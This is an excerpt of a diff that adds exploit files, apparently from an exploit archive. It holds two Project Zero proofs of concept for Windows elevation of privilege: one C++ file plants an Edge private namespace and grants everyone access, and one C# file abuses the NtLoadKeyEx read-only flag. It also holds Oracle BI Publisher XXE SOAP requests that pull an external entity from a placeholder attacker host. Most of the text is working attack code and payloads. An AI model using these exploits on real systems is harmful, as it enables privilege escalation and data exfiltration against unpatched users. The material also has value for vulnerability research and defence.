SID_IDENTIFIER_AUTHORITY il_id_auth = { { 0,0,0,0,0,0x10 } };
PSID_IDENTIFIER_AUTHORITY sid_id_auth = GetSidIdentifierAuthority(p);
if (memcmp(il_id_auth.Value, sid_id_auth->Value, sizeof(il_id_auth.Value)) == 0)
{
return !!AddIntegrityLabelToBoundaryDescriptor(&boundary_desc_, p);
}
else
{
return !!AddSIDToBoundaryDescriptor(&boundary_desc_, p);
}
}
}
HANDLE boundry_desc() {
return boundary_desc_;
}
private:
HANDLE boundary_desc_;
};
scoped_handle CreateLowboxToken()
{
PSID package_sid_p;
if (!ConvertStringSidToSid(L"S-1-15-2-1-1-1-1-1-1-1-1-1-1-1", &package_sid_p))
{
printf("[ERROR] creating SID: %d\n", GetLastError());
return nullptr;
}
local_free_ptr package_sid(package_sid_p);
HANDLE process_token_h;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &process_token_h))
{
printf("[ERROR] error opening process token SID: %d\n", GetLastError());
return nullptr;
}
scoped_handle process_token(process_token_h);
NtCreateLowBoxToken fNtCreateLowBoxToken = (NtCreateLowBoxToken)GetProcAddress(GetModuleHandle(L"ntdll"), "NtCreateLowBoxToken");
HANDLE lowbox_token_h;
OBJECT_ATTRIBUTES obja = {};
obja.Length = sizeof(obja);
NTSTATUS status = fNtCreateLowBoxToken(&lowbox_token_h, process_token_h, TOKEN_ALL_ACCESS, &obja, package_sid_p, 0, nullptr, 0, nullptr);
if (status != 0)
{
printf("[ERROR] creating lowbox token: %08X\n", status);
return nullptr;
}
scoped_handle lowbox_token(lowbox_token_h);
HANDLE imp_token;
if (!DuplicateTokenEx(lowbox_token_h, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation, TokenImpersonation, &imp_token))
{
printf("[ERROR] duplicating lowbox: %d\n", GetLastError());
return nullptr;
}
return scoped_handle(imp_token);
}
DWORD FindMicrosoftEdgeExe()
{
scoped_handle th_snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0));
if (!th_snapshot)
{
printf("[ERROR] getting snapshot: %d\n", GetLastError());
return 0;
}
PROCESSENTRY32 proc_entry = {};
proc_entry.dwSize = sizeof(proc_entry);
if (!Process32First(th_snapshot.get(), &proc_entry))
{
printf("[ERROR] enumerating snapshot: %d\n", GetLastError());
return 0;
}
do
{
if (_wcsicmp(proc_entry.szExeFile, L"microsoftedge.exe") == 0)
{
return proc_entry.th32ProcessID;
}
proc_entry.dwSize = sizeof(proc_entry);
} while (Process32Next(th_snapshot.get(), &proc_entry));
return 0;
}
void ChangeDaclOnNamespace(LPCWSTR name, const scoped_handle& token)
{
BoundaryDescriptor boundry;
if (!boundry.Initialize(name))
{
printf("[ERROR] initializing boundary descriptor: %d\n", GetLastError());
return;
}
PSECURITY_DESCRIPTOR psd;
ULONG sd_size = 0;
std::wstring sddl = L"D:(A;OICI;GA;;;WD)(A;OICI;GA;;;AC)(A;OICI;GA;;;WD)(A;OICI;GA;;;S-1-0-0)";
sddl += L"(A;OICI;GA;;;" + GetCurrentUserSid() + L")";
sddl += L"(A;OICI;GA;;;" + GetCurrentLogonSid() + L")";
sddl += L"S:(ML;OICI;NW;;;S-1-16-0)";
if (!ConvertStringSecurityDescriptorToSecurityDescriptor(sddl.c_str(), SDDL_REVISION_1, &psd, &sd_size))
{
printf("[ERROR] converting SDDL: %d\n", GetLastError());
return;
}
std::unique_ptr<void, LocalFreeDeleter> sd_buf(psd);
scoped_impersonation imp(token);
if (!imp.impersonation())
{
printf("[ERROR] impersonating lowbox: %d\n", GetLastError());
return;
}
private_namespace ns(OpenPrivateNamespace(boundry.boundry_desc(), name));
if (!ns)
{
printf("[ERROR] opening private namespace - %ls: %d\n", name, GetLastError());
return;
}
if (!SetKernelObjectSecurity(ns.get(), DACL_SECURITY_INFORMATION | LABEL_SECURITY_INFORMATION, psd))
{
printf("[ERROR] setting DACL on %ls: %d\n", name, GetLastError());
return;
}
printf("[SUCCESS] Opened Namespace and Reset DACL %ls\n", name);
}
int main()
{
scoped_handle lowbox_token = CreateLowboxToken();
if (!lowbox_token)
{
return 1;
}
std::wstring user_sid = GetCurrentUserSid();
DWORD pid = FindMicrosoftEdgeExe();
if (pid == 0)
{
printf("[ERROR] Couldn't find MicrosoftEdge.exe running\n");
return 1;
}
printf("[SUCCESS] Found Edge Browser at PID: %X\n", pid);
std::wstringstream ss;
ss << L"IsoScope_" << std::hex << pid;
ChangeDaclOnNamespace(ss.str().c_str(), lowbox_token);
return 0;
}

383
platforms/windows/local/40607.cpp Executable file
View file

@ -0,0 +1,383 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=878
Windows: Edge/IE Isolated Private Namespace Insecure Boundary Descriptor EoP
Platform: Windows 10 10586, Edge 25.10586.0.0 not tested 8.1 Update 2 or Windows 7
Class: Elevation of Privilege
Summary:
The isolated private namespace created by ierutils has an insecure Boundary Descriptor which allows any non-appcontainer sandbox process (such as chrome) or other users on the same system to gain elevated permissions on the namespace directory which could lead to elevation of privilege.
Description:
In iertutils library IsoOpenPrivateNamespace creates a new Window private namespace (which is an isolated object directory which can be referred to using a boundary descriptor). The function in most cases first calls OpenPrivateNamespace before falling back to CreatePrivateNamespace. The boundary descriptor used for this operation only has an easily guessable name, so its possible for another application to create the namespace prior to Edge/IE starting, ensuring the directory and other objects created underneath are accessible.
In order to attack this the Edge/IE process has to have not been started yet. This might be the case if trying to exploit from another sandbox application or from another user. The per-user namespace IEUser_USERSID_MicrosoftEdge is trivially guessable, however the IsoScope relies on the PID of the process. However theres no limit on the number of private namespaces a process can register (seems to just be based on resource consumption limits). Ive easily created 100,000 with different names before I gave up, so it would be trivial to plant the namespace name for any new Edge process, set the DACL as appropriate and wait for the user to login.
Also note on IE that the Isolated Scope namespace seems to be created before opened which would preclude this attack on that type, but it would still be exploitable on the per-user one.
Doing this would result in any new object in the isolated namespace being created by Edge or IE being accessible to the attacker. Ive not spent much time actually working out what is or isnt exploitable but at the least youd get some level of information disclosure and no doubt some potential for EoP.
Proof of Concept:
Ive provided a PoC as a C++ source code file. You need to compile it first targeted with Visual Studio 2015. It will create the user namespace.
1) Compile the C++ source code file.
2) Execute the PoC as another different user to the current one on the same system, this using runas. Pass the name of the user to spoof on the command line.
3) Start a copy of Edge
4) The PoC should print that its found and accessed the !PrivacIE!SharedMem!Settings section from the new Edge process.
Expected Result:
Planting the private namespace is not allowed.
Observed Result:
Access to the private namespace is granted and the DACL of the directory is set set to a list of inherited permissions which will be used for new objects.
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <winternl.h>
#include <sddl.h>
#include <memory>
#include <string>
#include <TlHelp32.h>
#include <strstream>
#include <sstream>
typedef NTSTATUS(WINAPI* NtCreateLowBoxToken)(
OUT PHANDLE token,
IN HANDLE original_handle,
IN ACCESS_MASK access,
IN POBJECT_ATTRIBUTES object_attribute,
IN PSID appcontainer_sid,
IN DWORD capabilityCount,
IN PSID_AND_ATTRIBUTES capabilities,
IN DWORD handle_count,
IN PHANDLE handles);
struct HandleDeleter
{
typedef HANDLE pointer;
void operator()(HANDLE handle)
{
if (handle && handle != INVALID_HANDLE_VALUE)
{
DWORD last_error = ::GetLastError();
CloseHandle(handle);
::SetLastError(last_error);
}
}
};
typedef std::unique_ptr<HANDLE, HandleDeleter> scoped_handle;
struct LocalFreeDeleter
{
typedef void* pointer;
void operator()(void* p)
{
if (p)
::LocalFree(p);
}
};
typedef std::unique_ptr<void, LocalFreeDeleter> local_free_ptr;
struct PrivateNamespaceDeleter
{
typedef HANDLE pointer;
void operator()(HANDLE handle)
{
if (handle && handle != INVALID_HANDLE_VALUE)
{
::ClosePrivateNamespace(handle, 0);
}
}
};
struct scoped_impersonation
{
BOOL _impersonating;
public:
scoped_impersonation(const scoped_handle& token) {
_impersonating = ImpersonateLoggedOnUser(token.get());
}
scoped_impersonation() {
if (_impersonating)
RevertToSelf();
}
BOOL impersonation() {
return _impersonating;
}
};
typedef std::unique_ptr<HANDLE, PrivateNamespaceDeleter> private_namespace;
std::wstring GetCurrentUserSid()
{
HANDLE token = nullptr;
if (!OpenProcessToken(::GetCurrentProcess(), TOKEN_QUERY, &token))
return false;
std::unique_ptr<HANDLE, HandleDeleter> token_scoped(token);
DWORD size = sizeof(TOKEN_USER) + SECURITY_MAX_SID_SIZE;
std::unique_ptr<BYTE[]> user_bytes(new BYTE[size]);
TOKEN_USER* user = reinterpret_cast<TOKEN_USER*>(user_bytes.get());
if (!::GetTokenInformation(token, TokenUser, user, size, &size))
return false;
if (!user->User.Sid)
return false;
LPWSTR sid_name;
if (!ConvertSidToStringSid(user->User.Sid, &sid_name))
return false;
std::wstring ret = sid_name;
::LocalFree(sid_name);
return ret;
}
std::wstring GetCurrentLogonSid()
{
HANDLE token = NULL;
if (!::OpenProcessToken(::GetCurrentProcess(), TOKEN_QUERY, &token))
return false;
std::unique_ptr<HANDLE, HandleDeleter> token_scoped(token);
DWORD size = sizeof(TOKEN_GROUPS) + SECURITY_MAX_SID_SIZE;
std::unique_ptr<BYTE[]> user_bytes(new BYTE[size]);
TOKEN_GROUPS* groups = reinterpret_cast<TOKEN_GROUPS*>(user_bytes.get());
memset(user_bytes.get(), 0, size);
if (!::GetTokenInformation(token, TokenLogonSid, groups, size, &size))
return false;
if (groups->GroupCount != 1)
return false;
LPWSTR sid_name;
if (!ConvertSidToStringSid(groups->Groups[0].Sid, &sid_name))
return false;
std::wstring ret = sid_name;
::LocalFree(sid_name);
return ret;
}
class BoundaryDescriptor
{
public:
BoundaryDescriptor()
: boundary_desc_(nullptr) {
}
~BoundaryDescriptor() {
if (boundary_desc_) {
DeleteBoundaryDescriptor(boundary_desc_);
}
}
bool Initialize(const wchar_t* name) {
boundary_desc_ = ::CreateBoundaryDescriptorW(name, 0);
if (!boundary_desc_)
return false;
return true;
}
bool AddSid(LPCWSTR sid_str)
{
if (_wcsicmp(sid_str, L"CU") == 0)
{
return AddSid(GetCurrentUserSid().c_str());
}
else
{
PSID p = nullptr;
if (!::ConvertStringSidToSid(sid_str, &p))
{
return false;
}
std::unique_ptr<void, LocalFreeDeleter> buf(p);
SID_IDENTIFIER_AUTHORITY il_id_auth = { { 0,0,0,0,0,0x10 } };
PSID_IDENTIFIER_AUTHORITY sid_id_auth = GetSidIdentifierAuthority(p);
if (memcmp(il_id_auth.Value, sid_id_auth->Value, sizeof(il_id_auth.Value)) == 0)
{
return !!AddIntegrityLabelToBoundaryDescriptor(&boundary_desc_, p);
}
else
{
return !!AddSIDToBoundaryDescriptor(&boundary_desc_, p);
}
}
}
HANDLE boundry_desc() {
return boundary_desc_;
}
private:
HANDLE boundary_desc_;
};
scoped_handle CreateLowboxToken()
{
PSID package_sid_p;
if (!ConvertStringSidToSid(L"S-1-15-2-1-1-1-1-1-1-1-1-1-1-1", &package_sid_p))
{
printf("[ERROR] creating SID: %d\n", GetLastError());
return nullptr;
}
local_free_ptr package_sid(package_sid_p);
HANDLE process_token_h;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &process_token_h))
{
printf("[ERROR] error opening process token SID: %d\n", GetLastError());
return nullptr;
}
scoped_handle process_token(process_token_h);
NtCreateLowBoxToken fNtCreateLowBoxToken = (NtCreateLowBoxToken)GetProcAddress(GetModuleHandle(L"ntdll"), "NtCreateLowBoxToken");
HANDLE lowbox_token_h;
OBJECT_ATTRIBUTES obja = {};
obja.Length = sizeof(obja);
NTSTATUS status = fNtCreateLowBoxToken(&lowbox_token_h, process_token_h, TOKEN_ALL_ACCESS, &obja, package_sid_p, 0, nullptr, 0, nullptr);
if (status != 0)
{
printf("[ERROR] creating lowbox token: %08X\n", status);
return nullptr;
}
scoped_handle lowbox_token(lowbox_token_h);
HANDLE imp_token;
if (!DuplicateTokenEx(lowbox_token_h, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation, TokenImpersonation, &imp_token))
{
printf("[ERROR] duplicating lowbox: %d\n", GetLastError());
return nullptr;
}
return scoped_handle(imp_token);
}
DWORD FindMicrosoftEdgeExe()
{
scoped_handle th_snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0));
if (!th_snapshot)
{
printf("[ERROR] getting snapshot: %d\n", GetLastError());
return 0;
}
PROCESSENTRY32 proc_entry = {};
proc_entry.dwSize = sizeof(proc_entry);
if (!Process32First(th_snapshot.get(), &proc_entry))
{
printf("[ERROR] enumerating snapshot: %d\n", GetLastError());
return 0;
}
do
{
if (_wcsicmp(proc_entry.szExeFile, L"microsoftedge.exe") == 0)
{
return proc_entry.th32ProcessID;
}
proc_entry.dwSize = sizeof(proc_entry);
} while (Process32Next(th_snapshot.get(), &proc_entry));
return 0;
}
void CreateNamespaceForUser(LPCWSTR account_name)
{
BYTE sid_bytes[MAX_SID_SIZE];
WCHAR domain[256];
SID_NAME_USE name_use;
DWORD sid_size = MAX_SID_SIZE;
DWORD domain_size = _countof(domain);
if (!LookupAccountName(nullptr, account_name, (PSID)sid_bytes, &sid_size, domain, &domain_size, &name_use))
{
printf("[ERROR] getting SId for account %ls: %d\n", account_name, GetLastError());
return;
}
LPWSTR sid_str;
ConvertSidToStringSid((PSID)sid_bytes, &sid_str);
std::wstring boundary_name = L"IEUser_";
boundary_name += sid_str;
boundary_name += L"_MicrosoftEdge";
BoundaryDescriptor boundry;
if (!boundry.Initialize(boundary_name.c_str()))
{
printf("[ERROR] initializing boundary descriptor: %d\n", GetLastError());
return;
}
PSECURITY_DESCRIPTOR psd;
ULONG sd_size = 0;
std::wstring sddl = L"D:(A;OICI;GA;;;WD)(A;OICI;GA;;;AC)(A;OICI;GA;;;WD)(A;OICI;GA;;;S-1-0-0)";
sddl += L"(A;OICI;GA;;;" + GetCurrentUserSid() + L")";
sddl += L"(A;OICI;GA;;;" + GetCurrentLogonSid() + L")";
sddl += L"S:(ML;OICI;NW;;;S-1-16-0)";
if (!ConvertStringSecurityDescriptorToSecurityDescriptor(sddl.c_str(), SDDL_REVISION_1, &psd, &sd_size))
{
printf("[ERROR] converting SDDL: %d\n", GetLastError());
return;
}
std::unique_ptr<void, LocalFreeDeleter> sd_buf(psd);
SECURITY_ATTRIBUTES secattr = {};
secattr.nLength = sizeof(secattr);
secattr.lpSecurityDescriptor = psd;
private_namespace ns(CreatePrivateNamespace(&secattr, boundry.boundry_desc(), boundary_name.c_str()));
if (!ns)
{
printf("[ERROR] creating private namespace - %ls: %d\n", boundary_name.c_str(), GetLastError());
return;
}
printf("[SUCCESS] Created Namespace %ls, start Edge as other user\n", boundary_name.c_str());
std::wstring section_name = boundary_name + L"\\!PrivacIE!SharedMem!Settings";
while (true)
{
HANDLE hMapping = OpenFileMapping(FILE_MAP_READ | FILE_MAP_WRITE, FALSE, section_name.c_str());
if (hMapping)
{
printf("[SUCCESS] Opened other user's !PrivacIE!SharedMem!Settings section for write access\n");
return;
}
Sleep(1000);
}
}
int wmain(int argc, wchar_t** argv)
{
if (argc < 2)
{
printf("PoC username to access\n");
return 1;
}
CreateNamespaceForUser(argv[1]);
return 0;
}

300
platforms/windows/local/40608.cs Executable file
View file

@ -0,0 +1,300 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=871
Windows: NtLoadKeyEx Read Only Hive Arbitrary File Write EoP
Platform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7
Class: Elevation of Privilege
Summary:
NtLoadKeyEx takes a flag to open a registry hive read only, if one of the hive files cannot be opened for read access it will revert to write mode and also impersonate the calling process. This can leading to EoP if a user controlled hive is opened in a system service.
Description:
One of the flags to NtLoadKeyEx is to open a registry hive with read only access. When this flag is passed the main hive file is opened for Read only, and no log files are opened or created. However theres a bug in the kernel function CmpCmdHiveOpen, initially it calls CmpInitHiveFromFile passing flag 1 in the second parameter which means open read-only. However if this fails with a number of error codes, including STATUS_ACCESS_DENIED it will recall the initialization function while impersonating the calling process, but it forgets to pass the read only flag. This means if the initial access fails, it will instead open the hive in write mode which will create the log files etc.
An example where this is used is in the WinRT COM activation routines of RPCSS. The GetPrivateHiveKeyFromPackageFullName method explicitly calls NtLoadKeyEx with the read only flag (rather than calling RegLoadAppKey which will not). As this is opening a user ActivationStore.dat hive inside the AppData\Local\Packages directory in the users profile its possible to play tricks with symbolic links to cause the opening of the hive inside the DCOM service to fail as the normal user then write the log files out as SYSTEM (as it calls RtlImpersonateSelfEx).
This is made all the worse because of the behaviour of the file creation routines. When the log files are being created the kernel copies the DACL from the main hive file to the new log files. This means that although we dont really control the log file contents we can redirect the write to an arbitrary location (and using symlink tricks ensure the name is suitable) then reopen the file as it has an explicit DACL copied from the main hive we control and we can change the files contents to whatever you like.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile it first targetted .NET 4 and above. Ive verified you can exploit RPCSS manually, however without substantial RE it wouldnt be a very reliable PoC, so instead Ive just provided an example file you can fun as a normal user. This will impersonate the anonymous token while opening the hive (which in reality would be DACLed to block the user from opening for read access) and we verify that the log files are created.
1) Compile the C# source code file.
2) Execute the PoC executable as a normal user.
3) The PoC should print that it successfully opened the hive in write mode.
Expected Result:
The hive fails to open, or at least only opens in read-only mode.
Observed Result:
The hive is opened in write mode incorrectly which can be abused to elevate privileges.
*/
using Microsoft.Win32;
using Microsoft.Win32.SafeHandles;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace PoC_NtLoadKeyEx_ReadOnlyFlag_EoP
{
class Program
{
[Flags]
public enum AttributeFlags : uint
{
None = 0,
Inherit = 0x00000002,
Permanent = 0x00000010,
Exclusive = 0x00000020,
CaseInsensitive = 0x00000040,
OpenIf = 0x00000080,
OpenLink = 0x00000100,
KernelHandle = 0x00000200,
ForceAccessCheck = 0x00000400,
IgnoreImpersonatedDevicemap = 0x00000800,
DontReparse = 0x00001000,
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class UnicodeString
{
ushort Length;
ushort MaximumLength;
[MarshalAs(UnmanagedType.LPWStr)]
string Buffer;
public UnicodeString(string str)
{
Length = (ushort)(str.Length * 2);
MaximumLength = (ushort)((str.Length * 2) + 1);
Buffer = str;
}
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class ObjectAttributes : IDisposable
{
int Length;
IntPtr RootDirectory;
IntPtr ObjectName;
AttributeFlags Attributes;
IntPtr SecurityDescriptor;
IntPtr SecurityQualityOfService;
private static IntPtr AllocStruct(object s)
{
int size = Marshal.SizeOf(s);
IntPtr ret = Marshal.AllocHGlobal(size);
Marshal.StructureToPtr(s, ret, false);
return ret;
}
private static void FreeStruct(ref IntPtr p, Type struct_type)
{
Marshal.DestroyStructure(p, struct_type);
Marshal.FreeHGlobal(p);
p = IntPtr.Zero;
}
public ObjectAttributes(string object_name)
{
Length = Marshal.SizeOf(this);
if (object_name != null)
{
ObjectName = AllocStruct(new UnicodeString(object_name));
}
Attributes = AttributeFlags.None;
}
public void Dispose()
{
if (ObjectName != IntPtr.Zero)
{
FreeStruct(ref ObjectName, typeof(UnicodeString));
}
GC.SuppressFinalize(this);
}
~ObjectAttributes()
{
Dispose();
}
}
[Flags]
public enum LoadKeyFlags
{
None = 0,
AppKey = 0x10,
Exclusive = 0x20,
Unknown800 = 0x800,
ReadOnly = 0x2000,
}
[Flags]
public enum GenericAccessRights : uint
{
None = 0,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
}
public class NtException : ExternalException
{
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string modulename);
[Flags]
enum FormatFlags
{
AllocateBuffer = 0x00000100,
FromHModule = 0x00000800,
FromSystem = 0x00001000,
IgnoreInserts = 0x00000200
}
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int FormatMessage(
FormatFlags dwFlags,
IntPtr lpSource,
int dwMessageId,
int dwLanguageId,
out IntPtr lpBuffer,
int nSize,
IntPtr Arguments
);
[DllImport("kernel32.dll")]
private static extern IntPtr LocalFree(IntPtr p);
private static string StatusToString(int status)
{
IntPtr buffer = IntPtr.Zero;
try
{
if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,
GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0)
{
return Marshal.PtrToStringUni(buffer);
}
}
finally
{
if (buffer != IntPtr.Zero)
{
LocalFree(buffer);
}
}
return String.Format("Unknown Error: 0x{0:X08}", status);
}
public NtException(int status) : base(StatusToString(status))
{
}
}
public static void StatusToNtException(int status)
{
if (status < 0)
{
throw new NtException(status);
}
}
[DllImport("Advapi32.dll")]
static extern bool ImpersonateAnonymousToken(
IntPtr ThreadHandle);
[DllImport("Advapi32.dll")]
static extern bool RevertToSelf();
[DllImport("ntdll.dll")]
public static extern int NtLoadKeyEx(ObjectAttributes DestinationName, ObjectAttributes FileName, LoadKeyFlags Flags,
IntPtr TrustKeyHandle, IntPtr EventHandle, GenericAccessRights DesiredAccess, out SafeRegistryHandle KeyHandle, int Unused);
static RegistryKey LoadKey(string path, bool read_only)
{
string reg_name = @"\Registry\A\" + Guid.NewGuid().ToString("B");
ObjectAttributes KeyName = new ObjectAttributes(reg_name);
ObjectAttributes FileName = new ObjectAttributes(@"\??\" + path);
SafeRegistryHandle keyHandle;
LoadKeyFlags flags = LoadKeyFlags.AppKey;
if (read_only)
flags |= LoadKeyFlags.ReadOnly;
int status = NtLoadKeyEx(KeyName,
FileName, flags, IntPtr.Zero,
IntPtr.Zero, GenericAccessRights.GenericRead, out keyHandle, 0);
if (status != 0)
return null;
return RegistryKey.FromHandle(keyHandle);
}
static bool CheckForLogs(string path)
{
return File.Exists(path + ".LOG1") || File.Exists(path + ".LOG2");
}
static void DoExploit()
{
string path = Path.GetFullPath("dummy.hiv");
RegistryKey key = LoadKey(path, false);
if (key == null)
{
throw new Exception("Something went wrong, couldn't create dummy hive");
}
key.Close();
// Ensure the log files are deleted.
File.Delete(path + ".LOG1");
File.Delete(path + ".LOG2");
if (CheckForLogs(path))
{
throw new Exception("Couldn't delete log files");
}
key = LoadKey(path, true);
if (key == null || CheckForLogs(path))
{
throw new Exception("Didn't open hive readonly");
}
key.Close();
ImpersonateAnonymousToken(new IntPtr(-2));
key = LoadKey(path, true);
RevertToSelf();
if (!CheckForLogs(path))
{
throw new Exception("Log files not recreated");
}
Console.WriteLine("[SUCCESS]: Read Only Hive Opened with Write Access");
}
static void Main(string[] args)
{
try
{
DoExploit();
}
catch (Exception ex)
{
Console.WriteLine("[ERROR]: {0}", ex.Message);
}
}
}
}

57
platforms/xml/webapps/40590.txt Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: Oracle BI Publisher (formerly XML Publisher) - XML External Entity Injection w/o authentication
# Date: 20\10\2016
# Exploit Author: Jakub Palaczynski
# CVE : CVE-2016-3473
# Vendor Homepage: https://www.oracle.com/
# Version: 11.1.1.6.0, 11.1.1.7.0, 11.1.1.9.0, 12.2.1.0.0
# Info: Previous versions may also be vulnerable.
# Google Dork: inurl:xmlpserver or intitle:"Oracle BI Publisher Enterprise Login"
1. Vulnerable SOAP Action: replyToXML
POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXML
Host: vulnerablehost
Content-Length: 630
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
<soapenv:Header/>
<soapenv:Body>
<ser:replyToXML soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
</ser:replyToXML>
</soapenv:Body>
</soapenv:Envelope>
------------------------------------------------
2. Vulnerable SOAP Action: replyToXMLWithContext
POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXMLWithContext
Host: vulnerablehost
Content-Length: 646
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
<soapenv:Header/>
<soapenv:Body>
<ser:replyToXMLWithContext soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
</ser:replyToXMLWithContext>
</soapenv:Body>
</soapenv:Envelope>